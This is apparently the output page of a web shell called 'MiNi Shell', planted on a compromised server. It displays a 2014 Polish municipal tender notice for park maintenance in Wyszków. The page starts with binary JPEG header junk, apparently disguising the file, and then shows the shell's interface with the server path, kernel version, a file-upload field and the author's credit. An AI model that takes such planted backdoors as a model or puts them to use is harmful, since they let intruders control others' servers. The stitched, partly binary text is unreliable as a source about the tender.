JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141210/404450-N-2014.html

<p class="kh_header"><b>Wyszków: Utrzymanie czystosci i zieleni w Parku Wazów i na Skwerze Jana Pawła II w Wyszkowie.</b><br>
<b>Numer ogłoszenia: 404450 - 2014; data zamieszczenia: 10.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wyszków , Aleja Róż 2, 07-200 Wyszków, woj. mazowieckie, tel. 029 7424201, faks 029 7424209.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wyszkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystosci i zieleni w Parku Wazów i na Skwerze Jana Pawła II w Wyszkowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I Zamówienie obejmuje m.in.:

1. Koszenie trawników w parku i na terenach przyległych (skarpa, teren ciągu pieszo-jezdnego nad rzeką, teren od ciągu pieszego do rzeki, teren Urzędu i wokół) w tym pozbieranie nieczystości widocznych po wykoszeniu, zamiecenie skoszonej trawy   z alejek parkowych i chodników - prace porządkowe należy wykonać niezwłocznie   po  skoszeniu  trawników.
2. Wygrabianie trawników w parku i na terenach przyległych (skoszonej trawy i liści). 
3. Cięcia pielęgnacyjne drzew (wraz z uporządkowaniem terenu).
4. Cięcia pielęgnacyjne żywopłotów (wraz z uporządkowaniem terenu).
5. Odchwaszczanie żywopłotów.
5a. Wygrabianie żywopłotów.
6. Uzupełnienie brakujących krzewów róż (odmiana Marathon).
6a. Pielęgnacja krzewów róż, w tym (nawożenie, podlewanie, odchwaszczanie oraz zabezpieczenie krzewów róż przed zimą).
7.  Nasadzenie  drzew  (klon, lipa, jaśminowiec). 
8. Renowacja  trawników.
9. Drobne naprawy ławek (konserwacja, uzupełnienie brakujących elementów, usunięcie  starych  powłok  malarskich  i pomalowanie ich).
10. Wycięcie drzew (łącznie  z  usunięciem  karp). 
11. a) Codzienne bieżące utrzymanie czystości w parku, na skarpie i ciągu  pieszo-jezdnym na odcinku od cieku struga do Alei Róż oraz na trawnikach i chodnikach przy ulicach przyległych:                  B. Joselewicza, T. Kościuszki, 3 Maja po obydwóch stronach, Aleja Róż tj.(opróżnianie koszy (w tym i koszy na psie odchody), omiatanie alejek, odśnieżanie  i  posypywanie alejek w parku oraz na w/w  terenach przyległych do  parku  mieszanką  uszorstniającą - do  godziny  700  oraz   wywożenie  śniegu w miarę potrzeby), omiatanie chodnika i zatoki parkingowej przy ul. B. Joselewicza                           (od parku do mostu kołowego). 
11. b) Codzienne utrzymanie czystości w miejscach odpoczynku (punkt widokowy i park ) oraz w miejscach gdzie zamontowane są urządzenia do ćwiczeń (opróżnianie koszy, omiatanie chodników, koszenie, zbieranie nieczystości, zamiecenie skoszonej trawy z chodników, odśnieżanie i posypywanie) - do godziny 700. Wykonywanie napraw punktów odpoczynku oraz ich konserwacja (odnowienie nawierzchni drewnianych  i metalowych, wymiana desek i innych  elementów). Drobne naprawy urządzeń   do ćwiczeń.
11.c) Codzienne bieżące utrzymanie czystości na Skwerze Jana Pawła II (omiatanie    schodów, chodników i ciągów pieszo - jezdnych w tym usuwanie nieczystości na w/w terenie oraz na terenach przyległych w obrębie 10 m, jak również sprzątanie po imprezach masowych organizowanych przez Gminę) -  do godz.700  odśnieżanie   i posypywanie chodników i ciągów pieszo- jezdnych oraz na terenach przyległych do Skweru Jana Pawła II mieszanką uszorstniającą oraz wywożenie śniegu w miarę potrzeby). Opróżnianie koszy ustawionych na Skwerze Jana Pawła II oraz na ciągu pieszym nad rzeką i ciągu pieszo-jezdnym. Odchwaszczanie i podlewanie krzewów                   i roślin wieloletnich. Koszenie trawników na Skwerze Jana Pawła II   i na terenach przyległych,  w parku,  na skarpie i przy ciągu pieszo-jezdnym od cieku struga do Alei Róż oraz trawniki przy ulicach przyległych B. Joselewicza,   T. Kościuszki, 3 Maja po obydwu stronach, Aleja Róż, na terenie Urzędu pozbieranie nieczystości widocznych po wykoszeniu, zamiecenie skoszonej trawy z chodników - prace porządkowe należy wykonać od razu po skoszeniu trawników; Wygrabienie trawników (skoszonej trawy i liści); Odchwaszczanie, podlewanie i pielęgnacja krzewów i roślin wieloletnich; Odśnieżanie i posypywanie środkami wymienionymi    w Rozporządzeniu Ministra Ochrony Środowiska z dnia 27 października 2005 roku w sprawie rodzajów i warunków stosowania środków, jakie mogą być używane    na drogach publicznych, ulicach i placach (Dz. U. 2005 r., Nr 230 poz.1960) chodników  i ciągów pieszo - jezdnych) na całym terenie; Oczyszczanie korytek deszczowych; Usuwanie  trawy  z  elementów  drobno  wymiarowych;  
12. Uzupełnienie  brakujących  płyt,  poprawne  ich,   ułożenie  na  skarpie.
13. Równanie i uzupełnianie alejek gruntowych. 
14. Uzupełnienie brakujących krzewów rosnących na małej górce w parku, pielęgnacja krzewów (podlewanie, odchwaszczanie) oraz dosypanie kory między krzewami. 
15. a) Malowanie konstrukcji i odnowienie tablic informacyjnych, 
b) remont i malowanie barierek punktu  widokowego,  odnowienie  herbu  Wyszkowa.
16. Założenie dekoracji świątecznych na drzewo rosnące (świerk) na placu przed budynkiem Urzędu Miejskiego oraz dekoracja drzewa (świerku) rosnącego przy ul. B. Joselewicza w tym naprawa  nieświecących elementów (wraz z wymianą żarówek).
17. Dekoracja wejść do budynku Urzędu Miejskiego od strony ul. 3 Maja i Alei Róż;
18. Zdjęcie dekoracji i przekazanie Administratorowi Urzędu.  
II.   Zasady realizacji przedmiotu zamówienia  
1. Prace wykonane będą każdorazowo po zleceniu przez Zamawiającego. Zlecenie zawierało będzie wskazanie miejsca, określenie rodzaju prac oraz termin wykonania prac - termin  wykonania  nie  dłuższy  niż  5  dni  roboczych od  daty  otrzymania  zlecenia. Koszenie trawy w parku - zgodnie ze wskazaniem przez Wykonawcę w ofercie.
2. Wykonawca zobowiązany jest niezwłocznie do zgłoszenia wykonania robót celem dokonania  odbioru.
3. Wykonawca we własnym zakresie zabezpiecza materiały i urządzenia oraz sprzęt niezbędny  do  wykonania  zamówienia.
4. Wykonawca zobowiązuje się do wykonywania usług w kamizelkach odblaskowych.
5. Zamawiający  nie  udziela  zaliczek  na  poczet  wykonania  umowy.
6. Wykonawca przed przystąpieniem do realizacji usługi zobowiązany jest do uzyskania zezwolenia od Burmistrza Wyszkowa na odbieranie odpadów komunalnych od   właścicieli   nieruchomości  oraz   ponoszenie  opłat  za  utylizację  odpadów oraz składania w Urzędzie Miejskim w Wyszkowie na bieżąco sprawozdań o zebranej ilości odpadów.
III.   Fakturowanie
1. Faktura za wykonanie usług zgodnie z formularzem cenowym wystawiane będą    na  koniec  każdego  miesiąca,  z  terminem  płatności  14  dni  od  daty  ich  złożenia.
2. Podstawą do wystawienia faktury za dany miesiąc będą potwierdzone przez Zamawiającego protokoły odbioru prac sporządzone każdorazowo po wykonaniu zlecenia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia Wykonawcy wybranemu w niniejszym postępowaniu zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień    w okresie 3 lat od udzielenia zamówienia podstawowego i stanowiącego zakres określony w dokumentacji projektowej.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.30.00-7, 77.31.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2000 zł (dwa tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże,  że wykonał w okresie ostatnich 3 lat, a jeśli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej 
1 zadanie  o charakterze i złożoności  co przedmiot zamówienia, polegające na pielęgnacji  zieleni na terenach zabytkowych.
	
Ocena tego warunku na podstawie wykazu wykonanych usług oraz załączeniem dowodów czy usługi  te zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował na etapie wykonywania zamówienia potencjałem technicznym niezbędnym do wykonania zamówienia tj.
1)	Kosiarka spalinowa - 2 szt. 
2)	Kosiarka żyłkowa 2 szt.
3)	Kosiarka traktorek 1 szt.
4)	Nożyce do żywopłotu spalinowe 2 szt.
5)	Piła spalinowa - 1 szt.
6)	Odkurzacz spalinowy 1 szt., 

Ocena tego warunku na podstawie wykazu narzędzi i urządzeń wraz z informacją o podstawie dysponowania tymi zasobami. Pojazdy będą sprawne techniczne - potwierdzone odpowiednim wpisem w dowodzie rejestracyjnym pojazdu (jeśli dotyczy).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia tj. min. 1 osobą posiadającą przygotowanie do wykonywania zabiegów ochrony pielęgnacji drzew (np. kurs, szkolenia itp.)
Ocena tego warunku na podstawie wykazu i oświadczenia Wykonawcy, że dysponuje/lub będzie dysponował  osobami wraz  z potwierdzeniem przygotowania do wykonywania zabiegów ochrony   i pielęgnacji drzew.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań. 
Oświadczenie Wykonawcy o spełnianiu warunku udziału w postepowaniu zgodnie z art. 22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty.
Dowód wniesienia wadium
Formularz cenowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - częstotliwość koszenia trawy wraz z wygrabianiem w parku - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	Zmiany w zakresie ceny przedmiotu zamówienia, jeśli konieczność wprowadzenia takiej zmiany jest skutkiem zmiany przepisów prawa w szczególności zmiany stawek podatku VAT,
2)	Zmiany terminu realizacji umowy w przypadku:
a)	wystąpienia okoliczności wynikających z siły wyższej (np. powodzie, huragany, gwałtowne burze, itp. warunków pogodowych), uniemożliwiających realizację usług. Wstrzymanie 
b)	w sytuacji, jeżeli z powodu warunków atmosferycznych wykonanie robót mogłoby grozić powstaniem szkody,
c)	potrzeby opóźnienia rozpoczęcia lub wstrzymania wykonywania usługi z przyczyn niezależnych od Zamawiającego np. przedłużającej się procedury przetargowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wyszkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Wyszkowie
Aleja Róż 2
07-200 Wyszków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2014 godzina 11:00, miejsce: Urząd Miejski w Wyszkowie
Aleja Róż 2
07-200 Wyszków
Kancelaria Urzędu pok. 145.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com